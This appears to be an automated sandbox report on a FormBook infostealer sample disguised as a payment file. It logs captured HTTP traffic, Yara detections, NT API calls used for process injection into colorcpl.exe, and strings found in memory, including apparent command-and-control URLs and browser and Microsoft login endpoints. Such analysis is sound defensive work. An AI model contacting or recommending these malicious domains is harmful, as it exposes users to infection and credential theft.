Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:48:49 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ukfpwmFHHCV2Giuk3DJsF1h6rgSqUPWY051ZiplgxZayO3f6%2BiBLMkn6t2MKyFXq837Eiu%2Fmt6mnYHcXkrHn%2BHFMCIUo53xX6xxTmSYFhGPMS0BkZ8dDo24p5AZZhrRgwskgASKe4ys%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8db8916a1eb946c6-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1221&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1766&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a Data Ascii: eaTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(bY<;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:48:51 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A3fX%2BGH3n4MSr74VKwm2XQPIucNfP6TVqclRNKNeoOOQNhYiwjOxH9vHPdAuHI4sbw7CubedeoHdflp%2BqJrSqOkUt0TvtesoTlPqddN%2BZPohESC6lB2jl84AdiFdgjcHsMmiyuJiOKk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8db8917a18e46b2e-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=471&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0

Source: colorcpl.exe, 00000007.00000002.4488704963.00000000061AA000.00000004.10000000.00040000.00000000.sdmp, xIrbjTuvDXL.exe, 00000008.00000002.4488131798.0000000003B2A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: colorcpl.exe, 00000007.00000002.4488704963.0000000005E86000.00000004.10000000.00040000.00000000.sdmp, xIrbjTuvDXL.exe, 00000008.00000002.4488131798.0000000003806000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://meanttobebroken.org/9g6s/?nl=l/X
Source: xIrbjTuvDXL.exe, 00000008.00000002.4490185532.0000000005739000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.roopiedutech.online
Source: xIrbjTuvDXL.exe, 00000008.00000002.4490185532.0000000005739000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.roopiedutech.online/f01d/
Source: colorcpl.exe, 00000007.00000002.4490954229.0000000008698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: colorcpl.exe, 00000007.00000002.4490954229.0000000008698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: colorcpl.exe, 00000007.00000002.4490954229.0000000008698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: colorcpl.exe, 00000007.00000002.4490954229.0000000008698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: colorcpl.exe, 00000007.00000002.4490954229.0000000008698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: colorcpl.exe, 00000007.00000002.4490954229.0000000008698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: colorcpl.exe, 00000007.00000002.4490954229.0000000008698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: colorcpl.exe, 00000007.00000002.4486968651.00000000037EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: colorcpl.exe, 00000007.00000002.4486968651.00000000037EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: colorcpl.exe, 00000007.00000002.4486968651.00000000037EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: colorcpl.exe, 00000007.00000002.4486968651.00000000037EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: colorcpl.exe, 00000007.00000002.4486968651.00000000037EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: colorcpl.exe, 00000007.00000002.4486968651.00000000037EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: colorcpl.exe, 00000007.00000003.2445410123.00000000085D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: colorcpl.exe, 00000007.00000002.4490954229.0000000008698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: colorcpl.exe, 00000007.00000002.4488704963.0000000006984000.00000004.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4490814883.0000000008310000.00000004.00000800.00020000.00000000.sdmp, xIrbjTuvDXL.exe, 00000008.00000002.4488131798.0000000004304000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: xIrbjTuvDXL.exe, 00000008.00000002.4488131798.0000000003998000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.jexiz.shop/li8d/?nl=sm

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 4.2.NF_Payment_Ref_FAN930276.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.NF_Payment_Ref_FAN930276.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2264308195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4487793740.00000000050A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2290607286.0000000004E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4486891698.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2266187962.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: NF_Payment_Ref_FAN930276.exe

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_0042C433 NtClose,	4_2_0042C433
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_0040A9E3 NtDelayExecution,	4_2_0040A9E3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02B60 NtClose,LdrInitializeThunk,	4_2_01B02B60
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_01B02DF0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_01B02C70
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B035C0 NtCreateMutant,LdrInitializeThunk,	4_2_01B035C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B04340 NtSetContextThread,	4_2_01B04340
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B04650 NtSuspendThread,	4_2_01B04650
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02BA0 NtEnumerateValueKey,	4_2_01B02BA0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02B80 NtQueryInformationFile,	4_2_01B02B80
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02BF0 NtAllocateVirtualMemory,	4_2_01B02BF0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02BE0 NtQueryValueKey,	4_2_01B02BE0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02AB0 NtWaitForSingleObject,	4_2_01B02AB0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02AF0 NtWriteFile,	4_2_01B02AF0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02AD0 NtReadFile,	4_2_01B02AD0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02DB0 NtEnumerateKey,	4_2_01B02DB0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02DD0 NtDelayExecution,	4_2_01B02DD0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02D30 NtUnmapViewOfSection,	4_2_01B02D30
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02D10 NtMapViewOfSection,	4_2_01B02D10
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02D00 NtSetInformationFile,	4_2_01B02D00
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02CA0 NtQueryInformationToken,	4_2_01B02CA0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02CF0 NtOpenProcess,	4_2_01B02CF0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02CC0 NtQueryVirtualMemory,	4_2_01B02CC0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02C00 NtQueryInformationProcess,	4_2_01B02C00
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02C60 NtCreateKey,	4_2_01B02C60
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02FB0 NtResumeThread,	4_2_01B02FB0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02FA0 NtQuerySection,	4_2_01B02FA0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02F90 NtProtectVirtualMemory,	4_2_01B02F90
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02FE0 NtCreateFile,	4_2_01B02FE0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02F30 NtCreateSection,	4_2_01B02F30
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02F60 NtCreateProcessEx,	4_2_01B02F60
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02EA0 NtAdjustPrivilegesToken,	4_2_01B02EA0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02E80 NtReadVirtualMemory,	4_2_01B02E80
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02EE0 NtQueueApcThread,	4_2_01B02EE0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B02E30 NtWriteVirtualMemory,	4_2_01B02E30
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B03090 NtSetValueKey,	4_2_01B03090
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B03010 NtOpenDirectoryObject,	4_2_01B03010
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B039B0 NtGetContextThread,	4_2_01B039B0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B03D10 NtOpenProcessToken,	4_2_01B03D10
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B03D70 NtOpenThread,	4_2_01B03D70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A4650 NtSuspendThread,LdrInitializeThunk,	7_2_052A4650
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A4340 NtSetContextThread,LdrInitializeThunk,	7_2_052A4340
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_052A2D30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_052A2D10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_052A2DF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2DD0 NtDelayExecution,LdrInitializeThunk,	7_2_052A2DD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2C60 NtCreateKey,LdrInitializeThunk,	7_2_052A2C60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_052A2C70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_052A2CA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2F30 NtCreateSection,LdrInitializeThunk,	7_2_052A2F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2FB0 NtResumeThread,LdrInitializeThunk,	7_2_052A2FB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2FE0 NtCreateFile,LdrInitializeThunk,	7_2_052A2FE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_052A2E80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_052A2EE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2B60 NtClose,LdrInitializeThunk,	7_2_052A2B60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2BA0 NtEnumerateValueKey,LdrInitializeThunk,	7_2_052A2BA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_052A2BE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_052A2BF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2AF0 NtWriteFile,LdrInitializeThunk,	7_2_052A2AF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2AD0 NtReadFile,LdrInitializeThunk,	7_2_052A2AD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A35C0 NtCreateMutant,LdrInitializeThunk,	7_2_052A35C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A39B0 NtGetContextThread,LdrInitializeThunk,	7_2_052A39B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2D00 NtSetInformationFile,	7_2_052A2D00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2DB0 NtEnumerateKey,	7_2_052A2DB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2C00 NtQueryInformationProcess,	7_2_052A2C00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2CF0 NtOpenProcess,	7_2_052A2CF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2CC0 NtQueryVirtualMemory,	7_2_052A2CC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2F60 NtCreateProcessEx,	7_2_052A2F60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2FA0 NtQuerySection,	7_2_052A2FA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2F90 NtProtectVirtualMemory,	7_2_052A2F90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2E30 NtWriteVirtualMemory,	7_2_052A2E30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2EA0 NtAdjustPrivilegesToken,	7_2_052A2EA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2B80 NtQueryInformationFile,	7_2_052A2B80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2AB0 NtWaitForSingleObject,	7_2_052A2AB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A3010 NtOpenDirectoryObject,	7_2_052A3010
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A3090 NtSetValueKey,	7_2_052A3090
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A3D10 NtOpenProcessToken,	7_2_052A3D10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A3D70 NtOpenThread,	7_2_052A3D70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_03068EC0 NtCreateFile,	7_2_03068EC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_03069320 NtAllocateVirtualMemory,	7_2_03069320
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_03069120 NtDeleteFile,	7_2_03069120
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_030691C0 NtClose,	7_2_030691C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_03069030 NtReadFile,	7_2_03069030

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 0_2_04831C48	0_2_04831C48
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 0_2_04CED344	0_2_04CED344
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_004183D3	4_2_004183D3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_00401110	4_2_00401110
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_0040E13B	4_2_0040E13B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_0042EAD3	4_2_0042EAD3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_00402370	4_2_00402370
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_0040FCC3	4_2_0040FCC3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_00416613	4_2_00416613
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_0040FEE3	4_2_0040FEE3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_0040DF63	4_2_0040DF63
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_00402710	4_2_00402710
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_00402FD0	4_2_00402FD0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B901AA	4_2_01B901AA
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B841A2	4_2_01B841A2
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B881CC	4_2_01B881CC
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC0100	4_2_01AC0100
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6A118	4_2_01B6A118
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B58158	4_2_01B58158
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B62000	4_2_01B62000
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ADE3F0	4_2_01ADE3F0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B903E6	4_2_01B903E6
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8A352	4_2_01B8A352
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B502C0	4_2_01B502C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B70274	4_2_01B70274
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B90591	4_2_01B90591
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0535	4_2_01AD0535
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B7E4F6	4_2_01B7E4F6
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B74420	4_2_01B74420
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B82446	4_2_01B82446
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACC7C0	4_2_01ACC7C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0770	4_2_01AD0770
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF4750	4_2_01AF4750
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEC6E0	4_2_01AEC6E0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD29A0	4_2_01AD29A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B9A9A6	4_2_01B9A9A6
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE6962	4_2_01AE6962
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AB68B8	4_2_01AB68B8
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFE8F0	4_2_01AFE8F0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD2840	4_2_01AD2840
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ADA840	4_2_01ADA840
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B86BD7	4_2_01B86BD7
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8AB40	4_2_01B8AB40
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACEA80	4_2_01ACEA80
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE8DBF	4_2_01AE8DBF
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACADE0	4_2_01ACADE0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6CD1F	4_2_01B6CD1F
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ADAD00	4_2_01ADAD00
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B70CB5	4_2_01B70CB5
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC0CF2	4_2_01AC0CF2
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0C00	4_2_01AD0C00
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4EFA0	4_2_01B4EFA0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ADCFE0	4_2_01ADCFE0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC2FC8	4_2_01AC2FC8
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B72F30	4_2_01B72F30
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B12F28	4_2_01B12F28
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF0F30	4_2_01AF0F30
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B44F40	4_2_01B44F40
